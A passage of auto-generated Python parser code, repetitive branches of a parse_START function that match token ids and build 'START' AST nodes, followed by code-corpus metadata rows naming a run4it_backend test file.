lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_4_check = lcl_7
lcl_7 = _slot_4_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_4_check
else:
lcl_8 = _slot_4_check[1]
lcl_8 = lcl_8
_slot_4 = lcl_8
lcl_8 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_5 = lcl_8
lcl_8 = (_slot_5 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'EOF not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4, _slot_5)
lcl_9 = prim__mk__ast('START', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 3):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 23):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 26):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 20):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 14):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 19):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 18):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 17):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 9):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 36):
lcl_6 = parse_Attrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_4_check = lcl_7
lcl_7 = _slot_4_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_4_check
else:
lcl_8 = _slot_4_check[1]
lcl_8 = lcl_8
_slot_4 = lcl_8
lcl_8 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_5 = lcl_8
lcl_8 = (_slot_5 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'EOF not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4, _slot_5)
lcl_9 = prim__mk__ast('START', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 39):
lcl_6 = parse_Attrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_4_check = lcl_7
lcl_7 = _slot_4_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_4_check
else:
lcl_8 = _slot_4_check[1]
lcl_8 = lcl_8
_slot_4 = lcl_8
lcl_8 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_5 = lcl_8
lcl_8 = (_slot_5 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'EOF not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4, _slot_5)
lcl_9 = prim__mk__ast('START', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 35):
lcl_6 = parse_Attrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_4_check = lcl_7
lcl_7 = _slot_4_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_4_check
else:
lcl_8 = _slot_4_check[1]
lcl_8 = lcl_8
_slot_4 = lcl_8
lcl_8 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_5 = lcl_8
lcl_8 = (_slot_5 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'EOF not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4, _slot_5)
lcl_9 = prim__mk__ast('START', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 8):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 16):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 34):
lcl_6 = parse_Attrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_4_check = lcl_7
lcl_7 = _slot_4_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_4_check
else:
lcl_8 = _slot_4_check[1]
lcl_8 = lcl_8
_slot_4 = lcl_8
lcl_8 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_5 = lcl_8
lcl_8 = (_slot_5 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'EOF not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4, _slot_5)
lcl_9 = prim__mk__ast('START', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 6):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 5):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 27):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 7):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 22):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 21):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 38):
lcl_6 = parse_Attrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_4_check = lcl_7
lcl_7 = _slot_4_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_4_check
else:
lcl_8 = _slot_4_check[1]
lcl_8 = lcl_8
_slot_4 = lcl_8
lcl_8 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_5 = lcl_8
lcl_8 = (_slot_5 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'EOF not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4, _slot_5)
lcl_9 = prim__mk__ast('START', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
else:
lcl_6 = (_off_3, 'START lookahead failed')
lcl_6 = prim__cons(lcl_6, prim__nil)
lcl_6 = lcl_6
lcl_6 = (False, lcl_6)
lcl_4 = lcl_6
lcl_3 = lcl_4
else:
lcl_4 = (_off_3, 'START got EOF')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
lcl_2 = lcl_3
lcl_1 = lcl_2
lcl_0 = lcl_1
return lcl_0
return parse_START
| 48.714329
| 2,057
| 0.361479
| 16,453
| 162,170
| 2.956482
| 0.010576
| 0.048846
| 0.073083
| 0.043562
| 0.961187
| 0.952038
| 0.941348
| 0.926814
| 0.923524
| 0.920646
| 0
| 0.076475
| 0.586354
| 162,170
| 3,328
| 2,058
| 48.728966
| 0.648664
| 0.000432
| 0
| 0.926195
| 1
| 0.000302
| 0.018402
| 0.000679
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005445
| false
| 0
| 0.00121
| 0
| 0.012099
| 0.000302
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b8105f044bd0c345fcc7906e6aad85e8cd9fcd89
| 19,850
|
py
|
Python
|
tests/test_resource_profile_goal.py
|
andraune/Run4IT_BackEnd
|
a481427a0d1189a1f08c42e7ac1b452af6bbfc8d
|
[
"MIT"
] | 1
|
2022-03-29T06:11:20.000Z
|
2022-03-29T06:11:20.000Z
|
tests/test_resource_profile_goal.py
|
andraune/run4it_backend
|
a481427a0d1189a1f08c42e7ac1b452af6bbfc8d
|
[
"MIT"
] | null | null | null |
tests/test_resource_profile_goal.py
|
andraune/run4it_backend
|
